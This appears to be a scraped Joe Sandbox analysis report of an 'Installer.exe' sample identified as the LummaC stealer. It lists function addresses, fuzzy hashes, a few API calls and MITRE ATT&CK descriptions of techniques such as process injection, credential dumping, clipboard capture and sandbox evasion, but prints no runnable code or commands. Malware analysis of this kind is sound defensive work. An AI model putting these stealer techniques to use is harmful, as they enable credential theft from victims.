Opcode Fuzzy Hash: b78a67225f0ff1aaedcf4193328401902f4751f8219e37ab98aedf65dbd7aabd
Instruction Fuzzy Hash: 5D516B316186628BC714CA28D4912BBF7D2EF95350F99862FD4958B381E37CDC16E38A

Function 00408E10 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a052206fc8cd0cba7b8eb45afaf1f47082f738554b1f690b1680a718490d35
Instruction ID: 48874c27c8534773aec939b37bfda30cf2c77197c4d733c1f187dec09a678d74
Opcode Fuzzy Hash: 10a052206fc8cd0cba7b8eb45afaf1f47082f738554b1f690b1680a718490d35
Instruction Fuzzy Hash: CE516F626083468FD7144A788901377FB92EBD6310F19877EE6C86F3C2D9389946D3DA

Function 0041A368 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20df83b1734cb7839b9a451c0afbb672384aa0a76882f5721a5255aeef406e3a
Instruction ID: b902612079553ae75879401b212b4336e48d3d7f084eecbc730cffc74336d4bc
Opcode Fuzzy Hash: 20df83b1734cb7839b9a451c0afbb672384aa0a76882f5721a5255aeef406e3a
Instruction Fuzzy Hash: 4A4126715063414BC728CF38C8557AFB3E1EFD2324F19866ED8D68B395E73888458746

Function 0042C44F Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e71617bc956541105803b924152801e8b212d5bb4f73ac25c6d3be970d612d
Instruction ID: c868a69575d8d1b97fb8a50a0803436a0aed4b6a91c239aae9ece050f534f435
Opcode Fuzzy Hash: a8e71617bc956541105803b924152801e8b212d5bb4f73ac25c6d3be970d612d
Instruction Fuzzy Hash: F151AAB5A48311CAD320DF14D89176BB7F1FFD5304F04882EE9898B3A1E7789949CB5A

Function 0040F15C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ed8a715ea5a47eef7924ef3013838540f2eb7f5106c4f9c5142feb7cacad743
Instruction ID: 390020018c3c5e7e8a0b2007a547811b0aefdf291c155bc881d083d900de85c5
Opcode Fuzzy Hash: 4ed8a715ea5a47eef7924ef3013838540f2eb7f5106c4f9c5142feb7cacad743
Instruction Fuzzy Hash: 325112B4101B019FE3248F56C595312BBA1FF44308F249AACD55A5FB96D3BAE42BCF84

Function 0043EEC0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae18095a005500642c9f8c9fa8dfbe12ffa5fd8247430f0a405e74d14088365b
Instruction ID: db388443774a2de8cd798de7d59426589eb53ecb7480dc7ec9f3314114f2c927
Opcode Fuzzy Hash: ae18095a005500642c9f8c9fa8dfbe12ffa5fd8247430f0a405e74d14088365b
Instruction Fuzzy Hash: AD318EB1904300ABE714AF25DC41B2BB7E9EF4834CF20583EF98557292E376DC158B9A

Function 0041E930 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c6426cedcd36b5c6fb370833f63ee8a515e29ccb2184de362fb99b20e13246
Instruction ID: d3a463d4382216d07c714c120fc87cc0bbd9e551c4ba6201f609969bf1b87cad
Opcode Fuzzy Hash: f3c6426cedcd36b5c6fb370833f63ee8a515e29ccb2184de362fb99b20e13246
Instruction Fuzzy Hash: 8B41E4741083419BE7109F29D81AB6FFBE1AFD2718F14CE2CF4D49B2D2D67988898746

Function 0042A450 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a685271c69a6ba9bafc3c7d0e52255275d5b223479939583e8f18743f2b9000
Instruction ID: 462cbdded15946fb105f25f1143bbc0dd74b91ea12c69bc5ad0cccd8b1962754
Opcode Fuzzy Hash: 6a685271c69a6ba9bafc3c7d0e52255275d5b223479939583e8f18743f2b9000
Instruction Fuzzy Hash: CD2189B15197809BE3009F65E99975FFFE5ABC2318F50192CF1D08B291C7B9C449CB86

Function 0043AC30 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: aa518f50a9947ab61fc2d1eca0895abb810a5a9c934b7b841ac88002b580a728
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 2111E933A451D40FC3168D3C8400565BFA31AA7635F59A39AF4F49B3D2D62B8D8A835A

Function 0042DCA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d467632780101c4e60e7de00bde26baebd034e87bccc790348d457ee9c2bc29
Instruction ID: 8b8d9dc6570c03ef0631d2f608d6abe9841e2780262978d6d163338e23d99437
Opcode Fuzzy Hash: 4d467632780101c4e60e7de00bde26baebd034e87bccc790348d457ee9c2bc29
Instruction Fuzzy Hash: BF01B5F1F0071147E720AE16F5C0B27B2A86F88718F58003ED8455B342DBB9EC05D299

Function 0041BD50 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2720d0126c1c4da0505db82eb123a33ffc9901fad4f5ee8188657bce0c229a2c
Instruction ID: 5d09ade4d27731b855a828df0a37a218fe1c294cc643004c6bdd20f937b806c0
Opcode Fuzzy Hash: 2720d0126c1c4da0505db82eb123a33ffc9901fad4f5ee8188657bce0c229a2c
Instruction Fuzzy Hash: 8A01CC301083818EE765CF3994643ABBBE1DBD3314F54999DE0D2A72A2C738D44AC786

Function 0042CA41 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dddf4cba9efa6599ac27263320a33349d9e83660c382adf05c88f4481b5b2c64
Instruction ID: 1b6814549eb502c8d20d47ef82730301c4808dfa2e83aa925a2cdeaf3ec08304
Opcode Fuzzy Hash: dddf4cba9efa6599ac27263320a33349d9e83660c382adf05c88f4481b5b2c64
Instruction Fuzzy Hash: 3D01F774B00415EEF228DB28EC9273E7396FB43364FF44267E412061A1D3345C6A858D

Function 00441740 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 381c6d00fb47937e56bb9ff0770db15678d08ad7ec56fd8b6c183323fbb70b92
Instruction ID: 56bcd41ec2ab57b62f0a616963d4c35cdfca696d82230f0655d359a77bca8461
Opcode Fuzzy Hash: 381c6d00fb47937e56bb9ff0770db15678d08ad7ec56fd8b6c183323fbb70b92
Instruction Fuzzy Hash: 74F0F47A910208ABF2105B46DC40D3773AEEBCE7A8F10032AF414122B1E322ED6187A9

Function 0040D520 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5565e34b504cc6b81b7665d5a2851cbc9f934250eef17533e2f2ce563de15709
Instruction ID: d30e8fa09c958a41b2679b1a81ef8b437515b8a4af321cb086c4342efa0ba9d4
Opcode Fuzzy Hash: 5565e34b504cc6b81b7665d5a2851cbc9f934250eef17533e2f2ce563de15709
Instruction Fuzzy Hash: 88F0D174808940AFD71A9B299C11A327762FF42388F68516DE442AB6E2C334FC248B59

Function 0042CC9C Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce89e76dab09c24f10ab4f03561a638ff6d50ff5a457efce6b3afa548bbcc66c
Instruction ID: d0ed24ef873716a74c24401ab6133aacff7ce70a8ee86ff9c13d2baacc2a9bcc
Opcode Fuzzy Hash: ce89e76dab09c24f10ab4f03561a638ff6d50ff5a457efce6b3afa548bbcc66c
Instruction Fuzzy Hash: 5CE01238704515CBC718DF56E99133FB3F2BB8B701B99907984035B620D334EC0A868D

Function 0041FFE0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f89bc5d49024418ebaac0d6223f42d2556c6a5f22dbd203d69d6cbbeed48b5
Instruction ID: a3df7ea2e4136154b6dee8b9aa0e05c5458aa9b19ca034cc8434a7f2951a06a4
Opcode Fuzzy Hash: e9f89bc5d49024418ebaac0d6223f42d2556c6a5f22dbd203d69d6cbbeed48b5
Instruction Fuzzy Hash: FDD05B115457B00E5255CD2454905B7B7FA9787116B5C645FD8D5D3205C129D8065618

Function 0042BE80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042BF4F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042BFDE

Strings

2TUJ, xrefs: 0042BEAA

Memory Dump Source

Source File: 00000002.00000002.2897543193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2897543193.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Installer.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2TUJ
API String ID: 237503144-1091987653
Opcode ID: 386033cf37a69d72ffe892673ecd413527d1f9fb705d3bc84bcd7a1b1714a732
Instruction ID: 283ec9918664ffccea628fd17701563cb1e54820b66d976a4c19bec13597d94b
Opcode Fuzzy Hash: 386033cf37a69d72ffe892673ecd413527d1f9fb705d3bc84bcd7a1b1714a732
Instruction Fuzzy Hash: B941227564C3148BD324CF24DC41BAFBBE6EB82308F09C93DE5959B6C1C775940A8B86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Installer.exe_61f0d4476017257c8adec5146cd9cfc793936bf_754596bf_efc50b0d-12ec-41bf-acb3-e7992197b463\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD47F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD58A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5CA.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
Installer.exe

Function 02D68639 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 02D687B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 010B06E8 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 010B2E43 Relevance: 1.6, APIs: 1, Instructions: 51
memoryCOMMON

Function 0043DCC0 Relevance: 32.4, APIs: 11, Strings: 7, Instructions: 917
memorycomCOMMON

Function 03301000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 00426970 Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 550
COMMON

Function 0041616F Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 456
COMMON

Function 00432966 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 307
COMMON

Function 0043106C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305
COMMON

Function 00438BA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Function 0040D7E3 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 304
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre